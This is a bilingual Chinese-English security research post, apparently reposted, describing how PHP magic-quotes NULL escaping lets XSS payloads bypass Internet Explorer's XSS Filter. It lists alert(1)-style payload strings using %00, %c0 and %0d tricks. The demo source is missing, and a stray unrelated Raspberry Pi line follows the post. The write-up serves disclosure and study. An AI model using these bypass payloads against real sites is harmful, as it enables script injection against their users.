作者/Sogili(@jackmasa)
首发/Insight-labs.org
在一些web容器中会对一些特殊字符做转换处理,这中间ie xss filter开发人员任何地方对它的了解有疏忽,都很可能导致bypass.
在php中,如果开启了”魔术引号”特性(magic_quotes_gpc = On),则‘ (single-quote), “ (double quote), (backslash) 和 NULL 字符将都会被反斜杠转义(%00 =>�).
通过一些测试,我发现ie xss filter对NULL字符的转义处理并不感冒,意思是它并不了解这种转换过程.
1. xss.php demo source code:
2. HTML bypass case:
%00%00v%00%00
tips:
1. 绕过字符必须出现在拦截规则中,例如拦截
3. Javascript bypass case:
“;alert(1)// %c0″;alert(%00)// %c0″;//(%0dalert(1)// %c0″;//(%0dalert(1)// %c0″;//(%00%0dalert(1)// %c0″//(%000000%0dalert(1)//
tips:
1. 需要通过多字节问题吃掉一个.
2. //(%000000%0d是用于绕过函数调用的拦截规则.
如果你有更多的想法或者小技巧,欢迎与我联系交流@jackmasa
####English Version:
Author/Sogili(@jackmasa)
Post/Insight-labs.org
Basically some special characters in the web container to do the conversion process,if developers mistake concept in the process,it might be bypass IE XSS Filter.
In PHP, if website enable magic_quote_gpc = On in php.ini , as we known ‘(single-quote), “ (double quote), (backslash) and NULL characters are backslash as an escape (%00 => �).
For my pentesting of the bypass IE Xss Filter, I feel the IE developers are don’t interest in IE Xss Filter against NULL characters are backslash ( ) escape character, I mean they aren’t depthly understanding of the conversion process.
1. xss.php demo source code:
2. HTML bypass case:
:( %00%00v%00%00 :( :D
tips:
1.bypass the characters must be appears in intercept rules of IE Xss Filter , for example: intercept
3. Javascript bypass case:
“;alert(1)// %c0″;alert(%00)// %c0″;//(%0dalert(1)// %c0″;//(%0dalert(1)// %c0″;//(%00%0dalert(1)// %c0″//(%000000%0dalert(1)//
tips:
1.Need through multi-byte problem close a backslash ( )
2. //(%000000%0d is used to bypass the function intercept rules.
Feel free to contact me with@jackmasa
转自:http://insight-labs.org/?p=499
文章来源于lcx.cc:PHP 魔术引号导致 IE XSS Filter bypass
英文原文地址:Overview | Adafruit's Raspberry Pi Lesson 2. First Time Configuration | Adafruit Learning System 0x00概述 In the first lesson…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论